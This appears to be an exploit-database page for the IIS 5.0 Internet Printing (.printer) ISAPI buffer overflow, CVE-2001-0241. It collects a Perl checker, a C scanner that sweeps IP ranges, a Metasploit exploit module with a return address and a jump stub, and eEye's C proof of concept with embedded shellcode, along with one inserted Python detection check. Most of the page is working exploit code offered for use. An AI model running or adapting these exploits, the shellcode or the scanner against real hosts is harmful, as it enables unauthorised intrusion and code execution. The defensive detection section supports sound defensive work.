Buffer overflow in Internet Printing ISAPI extension in Windows 2000 allows remote attackers to gain root privileges via a long print request that is passed to the extension through IIS 5.0.
CVE Information
Metrics
Metrics | Score | Severity | CVSS Vector                | Source
V2      | 10    |          | AV:N/AC:L/Au:N/C:C/I:C/A:C | nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date       | EPSS V0 | EPSS V1 | EPSS V2 (> 2022-02-04) | EPSS V3 (> 2025-03-07) | EPSS V4 (> 2025-03-17)
2022-02-06 | –       | –       | 61.45%                 | –                      | –
2023-03-12 | –       | –       | –                      | 95.37%                 | –
2023-08-20 | –       | –       | –                      | 95.53%                 | –
2024-02-25 | –       | –       | –                      | 95.42%                 | –
2024-06-02 | –       | –       | –                      | 95.42%                 | –
2024-12-22 | –       | –       | –                      | 94.71%                 | –
2025-01-19 | –       | –       | –                      | 94.71%                 | –
2025-03-18 | –       | –       | –                      | –                      | 89.92%
2025-04-10 | –       | –       | –                      | –                      | 88.82%
EPSS Percentile
The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of all other CVEs. The percentile therefore lets the EPSS score of one CVE be compared with that of every other CVE.
#source: https://www.securityfocus.com/bid/2674/info
#Windows 2000 Internet printing ISAPI extension contains msw3prt.dll which handles user requests. Due to an unchecked buffer in msw3prt.dll, a maliciously crafted HTTP .printer request containing approx 420 bytes in the 'Host:' field will allow the execution of arbitrary code. Typically a web server would stop responding in a buffer overflow condition; however, once Windows 2000 detects an unresponsive web server it automatically performs a restart. Therefore, the administrator will be unaware of this attack.
#* If Web-based Printing has been configured in group policy, attempts to disable or unmap the affected extension via Internet Services Manager will be overridden by the group policy settings.
#!/usr/bin/perl
# Exploit By storm@stormdev.net
# Tested with success against Win2k IIS 5.0 + SP1
# Remote Buffer Overflow Test for Internet Printing Protocol
# This code was written after eEye raised this issue on BugTraq.
use Socket;
print "-- IPP - IIS 5.0 Vulnerability Test By Storm --\n\n";
if (not $ARGV[0]) {
    print qq~
Usage: webexplt.pl <host>
~;
    exit;
}
$ip=$ARGV[0];
print "Sending Exploit Code to host: " . $ip . "\n\n";
my @results=sendexplt("GET /NULL.printer HTTP/1.0\n" . "Host: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n");
print "Results:\n";
if (not @results) {
    print "The Machine tested has the IPP Vulnerability!";
}
print @results;

sub sendexplt {
    my ($pstr)=@_;
    $target= inet_aton($ip) || die("inet_aton problems");
    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
        die("Socket problems\n");
    if(connect(S,pack "SnA4x8",2,80,$target)){
        select(S);
        $|=1;
        print $pstr;
        my @in=<S>;
        select(STDOUT);
        close(S);
        return @in;
    } else { die("Can't connect...\n"); }
}
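As an added detection-side example (not code from this page or from any of the exploit authors), the following Python check recognises the request shape these checkers share: a request routed to the `.printer` ISAPI mapping whose host value, either the Host header used by the Perl and C checkers or the absolute-URI host used by the Metasploit module further down this page, exceeds the 255-character DNS name limit. The threshold, the function names and the sample requests are constructed assumptions; the values 420, 257 and 260 quoted in the comments come from this page.

```python
import re
from typing import Optional, Tuple

# DNS names are at most 255 characters, so a longer host value is never
# legitimate. The checkers on this page send roughly 420 bytes, the Metasploit
# check 257, and eEye reports EIP overwritten at offset 260 (assumed threshold).
MAX_HOST_LEN = 255

REQUEST_LINE_RE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d$")
ABSOLUTE_URI_RE = re.compile(r"^https?://(?P<host>[^/?#]*)(?P<path>[^?#]*)", re.I)
HOST_HEADER_RE = re.compile(r"^host:\s*(?P<host>.*?)\s*$", re.I)


def parse_request(raw: bytes) -> Optional[Tuple[str, str, Optional[str], int]]:
    """Return (method, path, Host header value, absolute-URI host length); LF-only endings accepted."""
    head = raw.split(b"\r\n\r\n", 1)[0].split(b"\n\n", 1)[0]
    lines = head.decode("latin-1").replace("\r", "").split("\n")
    m = REQUEST_LINE_RE.match(lines[0])
    if not m:
        return None
    target = m.group("target")
    path, abs_host_len = target, 0
    a = ABSOLUTE_URI_RE.match(target)
    if a:  # proxy-style "GET http://<host>/..." as sent by the Metasploit module
        abs_host_len = len(a.group("host"))
        path = a.group("path") or "/"
    host = None
    for line in lines[1:]:
        h = HOST_HEADER_RE.match(line)
        if h:
            host = h.group("host")
            break
    return m.group("method"), path, host, abs_host_len


def is_printer_overflow_attempt(raw: bytes, max_host_len: int = MAX_HOST_LEN) -> bool:
    """True when a request reaches the .printer mapping with an oversized host value."""
    parsed = parse_request(raw)
    if parsed is None:
        return False
    _method, path, host, abs_host_len = parsed
    # Only requests mapped to msw3prt.dll (the .printer extension) can reach the bug.
    if not path.split("?", 1)[0].lower().endswith(".printer"):
        return False
    header_len = len(host) if host is not None else 0
    return max(header_len, abs_host_len) > max_host_len


# Constructed sample requests, not captured traffic.
SAMPLES = {
    "benign_page": b"GET /default.htm HTTP/1.0\r\nHost: www.example.com\r\n\r\n",
    "benign_printer": b"GET /printers/lp1.printer HTTP/1.0\r\nHost: print.example.com\r\n\r\n",
    "long_host_other_path": b"GET /index.html HTTP/1.0\r\nHost: " + b"A" * 420 + b"\r\n\r\n",
    # shape used by the Perl and C checkers: long Host header, LF-only line endings
    "storm_host_header": b"GET /NULL.printer HTTP/1.0\nHost: " + b"A" * 420 + b"\n\n",
    # shape used by the Metasploit module: overflow in the absolute-URI host, payload in the query
    "msf_absolute_uri": b"GET http://" + b"A" * 280 + b"/NULL.printer?PAYLOAD HTTP/1.0\r\n\r\n",
}

if __name__ == "__main__":
    for name, req in SAMPLES.items():
        print(f"{name:22s} -> {'ALERT' if is_printer_overflow_attempt(req) else 'ok'}")
```

Note that disabling the `.printer` mapping is the fix the advisory text on this page points at, and the same text warns that the mapping comes back when Web-based Printing is set by group policy, so a check like this is also a useful regression test for that configuration.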
/*
source: https://www.securityfocus.com/bid/2674/info
Windows 2000 Internet printing ISAPI extension contains msw3prt.dll which handles user requests. Due to an unchecked buffer in msw3prt.dll, a maliciously crafted HTTP .printer request containing approx 420 bytes in the 'Host:' field will allow the execution of arbitrary code. Typically a web server would stop responding in a buffer overflow condition; however, once Windows 2000 detects an unresponsive web server it automatically performs a restart. Therefore, the administrator will be unaware of this attack.
* If Web-based Printing has been configured in group policy, attempts to disable or unmap the affected extension via Internet Services Manager will be overridden by the group policy settings.
*/
/*
Author: styx^
source: Iis Isapi Vulnerabilities Checker v 1.0
License: GPL
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
Email: Write me for any problem or suggestion at: the.styx@gmail.com
Date: 02/02/2005
Read me: Just compile it with:
Compile: gcc iivc.c -o iivc
Use: ./iivc <initial_ip> <final_ip> [facultative(log_file)]
Example: ./iivc 127.0.0.1 127.0.0.4 scan.log
PAY ATTENTION: This source is coded for only personal use on
your own iis servers. Don't hack around.
Special thanks very much:
To overIP (he's my master :)
To hacklab crew (www.hacklab.tk)
Bug: This checker scans a range of ip and checks the iis 5.0/1
sp1/2 .printer ISAPI extension buffer overflow
vulnerability. If we send to a server about
420 bytes, we can do a buffer overflow. Find for more
specifications of this vulnerability in
www.securityfocus.com or bugtraq. Enjoy yourself! :)
(I've been inspired (but just this :) from perl storm@stormdev.net's
checker).
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>      /* inet_addr(); missing from the original listing */
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <time.h>

#define PORTA 80

/* i.j.k.l is the address currently being scanned, a.b.c.d the last one. */
int i = 0, j = 0, k = 0, l = 0;
int a = 0, b = 0, c = 0, d = 0;
int z = 0;                  /* set once the log file is open */
FILE *f;

int result(int );
void scan(char *);
void separe(char *, char *);
void write_file(char *);
void author();

int main(int argn, char *argv[]) {
    char initip[16], finip[16];
    char *sep = "+-------------------------------------------------------+\n\n\n";
    time_t s, iniz, fini;

    memset(initip, 0x0, 16);
    memset(finip, 0x0, 16);
    if ( argn < 4 ) {
        author();
        printf("\n\nUse: %s <initial_ip> <final_ip> <log_file>\n", argv[0]);
        printf("\nExample.\n%s 127.0.0.1 127.0.0.4 scan.log\n\n\n", argv[0]);
        exit(0);
    }
    time(&iniz);
    if((f = fopen(argv[3], "a")) == NULL) {
        printf("Error occurred when I try to open file %s\n", argv[3]);
        exit(1);            /* the original carried on and wrote through a NULL FILE* */
    }
    z++;
    printf("\nNow the checker will write the result of scan in %s in your local directory..\n\n", argv[3]);
    write_file("+-------------------------------------------------------+\n| ");
    s = time(NULL);
    write_file(asctime(localtime(&s)));
    write_file("+-------------------------------------------------------+\n|\n");
    sleep(1);
    author();
    sleep(2);
    separe(argv[1],argv[2]);
    sprintf(finip,"%d.%d.%d.%d",a,b,c,d);
    while(1) {
        sprintf(initip, "%d.%d.%d.%d", i, j, k, l);
        printf("\n\n\nI'm connecting to: %s\n", initip);
        scan(initip);
        if ( strcmp(initip, finip) == 0) {
            write_file("|");
            break;
        }
        /* step to the next address, carrying into the higher octets */
        l++;
        if ( l == 256) {
            l = 0;
            k++;
            if ( k == 256) {
                k = 0;
                j++;
                if (j == 256) {
                    j = 0;
                    i++;
                }
            }
        }
    }
    time(&fini);
    printf("\n*************************\n");
    printf("\nSCAN FINISHED! in %ld sec\n\n", (long)(fini - iniz));
    if( z > 0 ) {
        printf("You can view the file %s to see quietly scan's results..\n\n", argv[3]);
        fprintf(f, "\n%s\n", sep);
    }
    fclose(f);              /* sat after `return 0;` in the original, so it never ran */
    return 0;
}

/* Split the two dotted-quad strings into the global octet counters. */
void separe(char *ip,char *ip2) {
    char *t = NULL;
    int n = 0;

    t = strtok(ip,".");
    i = atoi(t);
    while( t != NULL) {
        t = strtok(NULL, ".");
        if ( t == NULL) break;  /* short input such as "10.0" no longer calls atoi(NULL) */
        n++;
        if ( n == 1) j = atoi(t);
        else if (n == 2) k = atoi(t);
        else if (n == 3) l = atoi(t);
    }
    t = NULL;
    n = 0;
    t = strtok(ip2,".");
    a = atoi(t);
    while( t != NULL) {
        t = strtok(NULL, ".");
        if ( t == NULL) break;
        n++;
        if ( n == 1) b = atoi(t);
        else if (n == 2) c = atoi(t);
        else if (n == 3) d = atoi(t);
    }
    return;
}

void scan(char *ip) {
    int sock, risp;
    struct sockaddr_in web;
    char buf[128];      /* 50 in the original; the "not vulnerable" line below needs up to 57 */

    if( (sock = socket(AF_INET,SOCK_STREAM,0)) < 0 ) {
        printf("Error occurred when I try to create socket\n");
        perror("sock:");
        return;
    }
    memset(&web, 0, sizeof(web));
    web.sin_family = AF_INET;
    web.sin_port = htons(PORTA);
    web.sin_addr.s_addr = inet_addr(ip);
    if( connect(sock, (struct sockaddr *)&web, sizeof(web)) < 0 ) {
        printf("I can't connect to %s..is it online?\n", ip);
        perror("connect: ");
        close(sock);        /* the original went on to send on the dead socket */
        return;
    }
    printf("Ok..I'm sending the string...");
    risp = result(sock);
    if( risp == 0 ) {
        printf("The server %s is vulnerable...i think that you have to install a patch! :)\n\n", ip);
        if ( z > 0 ) {
            snprintf(buf, sizeof(buf), "| The server %s is vulnerable.!\n", ip);
            write_file(buf);
        }
    } else {
        printf("I'm sorry: the server %s is not vulnerable..change target\n", ip);
        if ( z > 0 ) {
            snprintf(buf, sizeof(buf), "| I'm sorry:the server %s is not vulnerable.\n", ip);
            write_file(buf);
        }
    }
    sleep(1);
    close(sock);
    return;
}
int result(int sock) {
char *expl = "GET /NULL.printer HTTP/1.0\nHost: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n";
    char buf[1024];
    ssize_t n;

    memset(buf, 0, sizeof(buf));
    if( write(sock, expl, strlen(expl)) == -1) {
        printf("Error occurred when I try to send exploit...\n");
        perror("write: ");
        return -1;
    }
    n = read(sock, buf, sizeof(buf) - 1);
    if( n == -1) {
        printf("Error occurred when I try to read from sock...\n");
        perror("read: ");
    }
    /* The original tested `buf == NULL`, which is never true for a local
       array, so every host was reported as not vulnerable. The signature the
       author describes is an empty reply: the extension dies before answering
       and the connection is closed or reset (n == 0 or n == -1). */
    if( n <= 0) {
        return 0;
    } else {
        return -1;
    }
}
void write_file(char *buf) {
    fprintf(f, "%s", buf);
    return;
}

void author() {
    printf("\n\n\n");
    printf("+--------------------------------------------+\n");
    printf("| |\n");
    printf("| styx^ checker for |\n");
    printf("| IIS 5.0 sp1 sp2 ISAPI Buffer Overflows |\n");
    printf("| |\n");
    printf("+--------------------------------------------+\n\n");
}
Publication date: 2001-04-30 22h00 +00:00 | Author: Cyrus The Great | EDB Verified: Yes
source: https://www.securityfocus.com/bid/2674/info
Windows 2000 Internet printing ISAPI extension contains msw3prt.dll which handles user requests. Due to an unchecked buffer in msw3prt.dll, a maliciously crafted HTTP .printer request containing approx 420 bytes in the 'Host:' field will allow the execution of arbitrary code. Typically a web server would stop responding in a buffer overflow condition; however, once Windows 2000 detects an unresponsive web server it automatically performs a restart. Therefore, the administrator will be unaware of this attack.
* If Web-based Printing has been configured in group policy, attempts to disable or unmap the affected extension via Internet Services Manager will be overridden by the group policy settings.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20818.zip
##
# $Id: ms01_023_printer.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft IIS 5.0 Printer Host Header Overflow',
      'Description'    => %q{
          This exploits a buffer overflow in the request processor of
        the Internet Printing Protocol ISAPI module in IIS. This
        module works against Windows 2000 service pack 0 and 1. If
        the service stops responding after a successful compromise,
        run the exploit a couple more times to completely kill the
        hung process.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 9179 $',
      'References'     =>
        [
          [ 'CVE', '2001-0241'],
          [ 'OSVDB', '3323'],
          [ 'BID', '2674'],
          [ 'MSB', 'MS01-023'],
          [ 'URL', 'http://seclists.org/lists/bugtraq/2001/May/0005.html'],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 900,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'StackAdjustment' => -3500,
        },
      'Targets'        =>
        [
          [
            'Windows 2000 English SP0-SP1',
            {
              'Platform' => 'win',
              'Ret'      => 0x732c45f3,
            },
          ],
        ],
      'Platform'       => 'win',
      'DisclosureDate' => 'May 1 2001',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(80)
      ], self.class)
  end

  def check
    connect
    sock.put("GET /NULL.printer HTTP/1.0\r\n\r\n")
    resp = sock.get_once
    disconnect

    if !(resp and resp =~ /Error in web printer/)
      return Exploit::CheckCode::Safe
    end

    connect
    sock.put("GET /NULL.printer HTTP/1.0\r\nHost: #{"X"*257}\r\n\r\n")
    resp = sock.get_once
    disconnect

    if (resp and resp =~ /locked out/)
      print_status("The IUSER account is locked out, we can't check")
      return Exploit::CheckCode::Detected
    end

    # String#index returns nil when the marker is absent, and `nil >= 0` raises,
    # so test the return value for truthiness instead of comparing it to 0.
    if (resp and resp.index("HTTP/1.1 500"))
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    connect

    buf = make_nops(280)
    buf[268, 4] = [target.ret].pack('V')

    # payload is at: [ebx + 96] + 256 + 64
    buf << "\x8b\x4b\x60"  # mov ecx, [ebx + 96]
    buf << "\x80\xc1\x40"  # add cl, 64
    buf << "\x80\xc5\x01"  # add ch, 1
    buf << "\xff\xe1"      # jmp ecx

    sock.put("GET http://#{buf}/NULL.printer?#{payload.encoded} HTTP/1.0\r\n\r\n")

    handler
    disconnect
  end

end
Publication date: 2001-05-06 22h00 +00:00 | Author: Ryan Permeh | EDB Verified: Yes
/***********************************************************************
iishack 2000 - eEye Digital Security - 2001
This affects all unpatched windows 2000 machines with the .printer
isapi filter loaded. This is purely proof of concept.
Quick rundown of the exploit:
Eip overruns at position 260
i have 19 bytes of code to jump back to the beginning of the buffer.
(and a 4 byte eip jumping into a jmp esp located in mfc42.dll). The
jumpback was kinda weird, requiring a little forward padding to protect
the rest of the code.
The buffer itself:
You only have about 250ish bytes before the overflow (taking into
account the eip and jumpback), and like 211 after it. this makes
things tight. This is why i hardcoded the offsets and had 2 shellcodes,
one for each revision. normally, this would suck, but since iis is kind
to us, it cleanly restarts itself if we blow it, giving us another chance.
This should compile clean on windows, linux and *bsd. Other than that, you
are on your own, but the vector is a simple tcp vector, so no biggie.
The vector:
the overflow happens in the isapi handling the .printer extension. The actual
overflow is in the Host: header. This buffer is a bit weird, so be careful
what you pass into it. It has a minimal amount of parsing happening before
we get it, making some chars not able to be used(or forcing you to encode
your payload). As far as i can tell, the bad bytes i've come across are:
0x00(duh)
0x0a(this inits a return, basically flaking our buffer)
0x0d(same as above)
0x3a(colon: - this seems to be a separator of some kind, didn't have time or
energy to reverse it any further, it breaks stuff, keep it out of
your buffer)
i have a feeling that there are more bad chars, but in the shellcode i've written
(both this proof of concept and actual port binding shellcode), i've come across
problems, but haven't specifically tagged a "bad" char.
One more thing... initially, i got this shellcode to fit on the left side of
the buffer overflow. something strange was causing it to fail if i had a length
of under about 315 chars. This seems strange to me, but it could be something i
just screwed up writing this code. This explains the 0x03s padding the end of the
shellcode.
Ryan Permeh
ryan@eeye.com
greetz: riley, for finding the hole
marc, for being a cool boss
dale,nicula,firas, for being pimps
greg hoglund, for sparking some really interesting ideas on exploitable buffers
dark spyrit, for beginning the iis hack tradition
I would also like to thank the academy and to all of those who voted....
Barry, Levonne, and their $240.00 worth of pudding.
http://www.eeye.com/html/research/Advisories/tequila.jpg
*************************************************************************/
#ifdef _WIN32
#include <Winsock2.h>
#include <Windows.h>
#define snprintf _snprintf
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>      /* inet_ntoa() */
#include <netdb.h>
#include <unistd.h>         /* close() */
#endif
#include <stdio.h>
#include <stdlib.h>         /* atoi(), exit() */
#include <string.h>         /* memset(), memcpy(), strlen() */

void usage();
unsigned char GetXORValue(char *szBuff, unsigned long filesize);
unsigned char sc[2][315]={
"\x8b\xc4\x83\xc0\x11\x33\xc9\x66\xb9\x20\x01\x80\x30\x03\x40\xe2\xfa\xeb"
"\x03\x03\x03\x03\x5c\x88\xe8\x82\xef\x8f\x09\x03\x03\x44\x80\x3c\xfc\x76"
"\xf9\x80\xc4\x07\x88\xf6\x30\xca\x83\xc2\x07\x88\x04\x8a\x05\x80\xc5\x07"
"\x80\xc4\x07\xe1\xf7\x30\xc3\x8a\x3d\x80\xc5\x07\x80\xc4\x17\x8a\x3d\x80"
"\xc5\x07\x30\xc3\x82\xc4\xfc\x03\x03\x03\x53\x6b\x83\x03\x03\x03\x69\x01"
"\x53\x53\x6b\x03\x03\x03\x43\xfc\x76\x13\xfc\x56\x07\x88\xdb\x30\xc3\x53"
"\x54\x69\x48\xfc\x76\x17\x50\xfc\x56\x0f\x50\xfc\x56\x03\x53\xfc\x56\x0b"
"\xfc\xfc\xfc\xfc\xcb\xa5\xeb\x74\x8e\x28\xea\x74\xb8\xb3\xeb\x74\x27\x49"
"\xea\x74\x60\x39\x5f\x74\x74\x74\x2d\x66\x46\x7a\x66\x2d\x60\x6c\x6e\x2d"
"\x77\x7b\x77\x03\x6a\x6a\x70\x6b\x62\x60\x68\x31\x68\x23\x2e\x23\x66\x46"
"\x7a\x66\x23\x47\x6a\x64\x77\x6a\x62\x6f\x23\x50\x66\x60\x76\x71\x6a\x77"
"\x7a\x0e\x09\x23\x45\x6c\x71\x23\x67\x66\x77\x62\x6a\x6f\x70\x23\x75\x6a"
"\x70\x6a\x77\x39\x23\x4b\x77\x77\x73\x39\x2c\x2c\x74\x74\x74\x2d\x66\x46"
"\x7a\x66\x2d\x60\x6c\x6e\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03"
"\x03\x03\x03\x03\x03\x03\x03\x03\x90\x90\x90\x90\x90\x90\x90\x90\xcb\x4a"
"\x42\x6c\x90\x90\x90\x90\x66\x81\xec\x14\x01\xff\xe4\x03\x03\x03\x03\x03"
"\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x00"
"\x8b\xc4\x83\xc0\x11\x33\xc9\x66\xb9\x20\x01\x80\x30\x03\x40\xe2\xfa\xeb"
"\x03\x03\x03\x03\x5c\x88\xe8\x82\xef\x8f\x09\x03\x03\x44\x80\x3c\xfc\x76"
"\xf9\x80\xc4\x07\x88\xf6\x30\xca\x83\xc2\x07\x88\x04\x8a\x05\x80\xc5\x07"
"\x80\xc4\x07\xe1\xf7\x30\xc3\x8a\x3d\x80\xc5\x07\x80\xc4\x17\x8a\x3d\x80"
"\xc5\x07\x30\xc3\x82\xc4\xfc\x03\x03\x03\x53\x6b\x83\x03\x03\x03\x69\x01"
"\x53\x53\x6b\x03\x03\x03\x43\xfc\x76\x13\xfc\x56\x07\x88\xdb\x30\xc3\x53"
"\x54\x69\x48\xfc\x76\x17\x50\xfc\x56\x0f\x50\xfc\x56\x03\x53\xfc\x56\x0b"
"\xfc\xfc\xfc\xfc\x50\x33\xeb\x74\xf7\x86\xeb\x74\x2e\xf0\xeb\x74\x4c\x30"
"\xeb\x74\x60\x39\x5f\x74\x74\x74\x2d\x66\x46\x7a\x66\x2d\x60\x6c\x6e\x2d"
"\x77\x7b\x77\x03\x6a\x6a\x70\x6b\x62\x60\x68\x31\x68\x23\x2e\x23\x66\x46"
"\x7a\x66\x23\x47\x6a\x64\x77\x6a\x62\x6f\x23\x50\x66\x60\x76\x71\x6a\x77"
"\x7a\x0e\x09\x23\x45\x6c\x71\x23\x67\x66\x77\x62\x6a\x6f\x70\x23\x75\x6a"
"\x70\x6a\x77\x39\x23\x4b\x77\x77\x73\x39\x2c\x2c\x74\x74\x74\x2d\x66\x46"
"\x7a\x66\x2d\x60\x6c\x6e\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03"
"\x03\x03\x03\x03\x03\x03\x03\x03\x90\x90\x90\x90\x90\x90\x90\x90\xcb\x4a"
"\x42\x6c\x90\x90\x90\x90\x66\x81\xec\x14\x01\xff\xe4\x03\x03\x03\x03\x03"
"\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x00"
};
int main (int argc, char *argv[])
{
    char request_message[500];
    int X,sock,sp=0;
    unsigned short serverport=htons(80);
    struct hostent *nametocheck;
    struct sockaddr_in serv_addr;
    struct in_addr attack;
#ifdef _WIN32
    WORD werd;
    WSADATA wsd;
    werd= MAKEWORD(2,0);
    WSAStartup(werd,&wsd);
#endif
    printf("iishack2000 - Remote .printer overflow in 2k sp0 and sp1\n");
    printf("Vulnerability found by Riley Hassell <riley@eeye.com>\n");
    printf("Exploit by Ryan Permeh <ryan@eeye.com>\n");
    if(argc < 4) usage();
    if(argv[1] != NULL)
    {
        nametocheck = gethostbyname (argv[1]);
        if(nametocheck == NULL)     /* the original dereferenced a NULL result */
        {
            printf("Couldn't resolve %s\n",argv[1]);
            exit(1);
        }
        memcpy(&attack.s_addr,nametocheck->h_addr_list[0],4);
    }
    else usage();
    if(argv[2] != NULL)
    {
        /* host-to-network, not ntohs() as in the original (same result on little-endian only) */
        serverport=htons((unsigned short)atoi(argv[2]));
    }
    if(argv[3] != NULL)
    {
        sp=atoi(argv[3]);
        if(sp != 0 && sp != 1) usage();     /* sc[] only has entries for sp0 and sp1 */
    }
    printf("Sending string to overflow sp %d for host: %s on port:%d\n",sp,inet_ntoa(attack),ntohs(serverport));
    memset(request_message,0x00,500);
    snprintf(request_message,500,"GET /null.printer HTTP/1.1\r\nHost: %s\r\n\r\n",sc[sp]);
    sock = socket (AF_INET, SOCK_STREAM, 0);
    memset (&serv_addr, 0, sizeof (serv_addr));
    serv_addr.sin_family=AF_INET;
    serv_addr.sin_addr.s_addr = attack.s_addr;
    serv_addr.sin_port = serverport;
    X=connect (sock, (struct sockaddr *) &serv_addr, sizeof (serv_addr));
    if(X==0)
    {
        send(sock,request_message,strlen(request_message)*sizeof(char),0);
        printf("Sent overflow, now look on the c: drive of %s for www.eEye.com.txt\n",inet_ntoa(attack));
        printf("If the file doesn't exist, the server may be patched,\nor may be a different service pack (try again with %d as the service pack)\n",sp==0?1:0);
    }
    else
    {
        printf("Couldn't connect to %s\n",inet_ntoa(attack));
    }
#ifdef _WIN32
    closesocket(sock);
#else
    close(sock);
#endif
    return 0;
}
void usage()
{
    printf("Syntax: iishack2000 <hostname> <server port> <service pack>\n");
    printf("Example: iishack2000 127.0.0.1 80 0\n");
    printf("Example: iishack2000 127.0.0.1 80 1\n");
    exit(1);
}
// milw0rm.com [2001-05-07]